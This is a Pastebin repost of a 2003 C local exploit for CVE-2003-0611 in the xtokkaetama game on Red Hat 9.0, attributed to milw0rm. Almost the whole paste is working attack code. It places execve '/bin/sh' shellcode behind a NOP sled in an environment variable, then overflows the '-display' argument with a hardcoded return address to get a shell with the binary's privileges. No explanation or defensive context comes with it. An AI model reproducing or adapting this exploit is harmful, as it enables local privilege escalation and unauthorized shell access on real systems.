Advertisement
FlyFar

xtokkaetama 1.0b (RedHat 9.0) - Local Game - CVE-2003-0611

Feb 7th, 2024
962
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.46 KB | Cybersecurity | 0 0
  1. /*
  2. *  xtokkaetama 1.0b local game exploit on Red Hat 9.0
  3. *               Coded by brahma (31/07/2003)
  4. *
  5. *       http://www.debian.org/security/2003/dsa-356
  6. */
  7.  
  8.  
  9. #include <stdlib.h>
  10. #define RETADDR 0xbfffff11
  11. #define DEFAULT_BUFFER_SIZE 29
  12. #define DEFAULT_EGG_SIZE 512
  13. #define NOP 0x90
  14. #define BIN "/usr/X11R6/bin/xtokkaetama"
  15. char shellcode[] =
  16. "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  17. "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  18. "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  19.  
  20. unsigned long get_esp(void) {
  21. __asm__("movl %esp,%eax");
  22. }
  23.  
  24. void main(int argc, char *argv[]) {
  25. char *buff, *ptr, *egg;
  26. long *addr_ptr, addr;
  27. int bsize=DEFAULT_BUFFER_SIZE;
  28. int i, eggsize=DEFAULT_EGG_SIZE;
  29.  
  30. if (argc > 1) bsize = atoi(argv[1]);
  31. if (argc > 2) eggsize = atoi(argv[2]);
  32.  
  33.  
  34. if (!(buff = malloc(bsize))) {
  35. printf("Can't allocate memory.\n");
  36. exit(0);
  37. }
  38. if (!(egg = malloc(eggsize))) {
  39. printf("Can't allocate memory.\n");
  40. exit(0);
  41. }
  42.  
  43. addr = RETADDR;
  44. printf("Using address: 0x%x\n", addr);
  45.  
  46. ptr = buff;
  47. addr_ptr = (long *) ptr;
  48. for (i = 0; i < bsize; i+=4)
  49. *(addr_ptr++) = addr;
  50.  
  51. ptr = egg;
  52. for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
  53. *(ptr++) = NOP;
  54.  
  55. for (i = 0; i < strlen(shellcode); i++)
  56. *(ptr++) = shellcode[i];
  57.  
  58. buff[bsize - 1] = '\0';
  59. egg[eggsize - 1] = '\0';
  60.  
  61. memcpy(egg,"EGG=",4);
  62. putenv(egg);
  63. execl(BIN,BIN,"-display",buff,NULL);
  64. }
  65.  
  66.  
  67.  
  68. // milw0rm.com [2003-08-01]
  69.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement